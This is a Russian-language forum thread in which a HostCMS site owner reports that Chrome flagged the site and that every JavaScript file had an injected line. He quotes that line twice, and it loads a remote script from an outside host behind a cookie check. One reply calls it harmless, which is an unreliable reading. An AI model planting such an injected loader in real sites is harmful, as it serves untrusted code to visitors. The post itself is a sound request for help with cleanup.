Заражение HostCms JavaScript-вирусом
1 февраля 2013 г.
Есть сайт написанный на HostCMS v.5. Пароль сложный. Доступ к сайту имеют несколько менеджеров заказчика. FTP только у меня.
В один "прекрасный" момент Chrome заблокировал мне доступ к сайту мотивировав это вредоносным содержимым.
Я порылся в коде и нашел, что к каждому js-файлу добавлена строчка :
===
function g(){var r=new RegExp("(?:; )?1=([^;]*);?"
;return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://ratingsite.org/ratingsite.php"></scr'+'ipt>';}
===
Знает ли кто-нибудь, как эта фигня могла попасть на сайт? Через похищение пароля или есть все-же дыры в админке?
Первый раз такое вижу на HostCMS.
В один "прекрасный" момент Chrome заблокировал мне доступ к сайту мотивировав это вредоносным содержимым.
Я порылся в коде и нашел, что к каждому js-файлу добавлена строчка :
===
function g(){var r=new RegExp("(?:; )?1=([^;]*);?"
;return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://ratingsite.org/ratingsite.php"></scr'+'ipt>'
;}===
Знает ли кто-нибудь, как эта фигня могла попасть на сайт? Через похищение пароля или есть все-же дыры в админке?
Первый раз такое вижу на HostCMS.
1 февраля 2013 г.
1 февраля 2013 г.
1 февраля 2013 г.
10 августа 2013 г.
10 августа 2013 г.
Больше похоже на безобидный скрипт показывающий какой-то блок. 
12 августа 2013 г.
12 августа 2013 г.
13 августа 2013 г.
